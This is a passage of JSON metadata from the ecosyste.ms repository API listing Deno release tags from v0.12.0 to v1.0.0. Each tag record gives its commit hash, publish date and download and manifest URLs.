eno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:0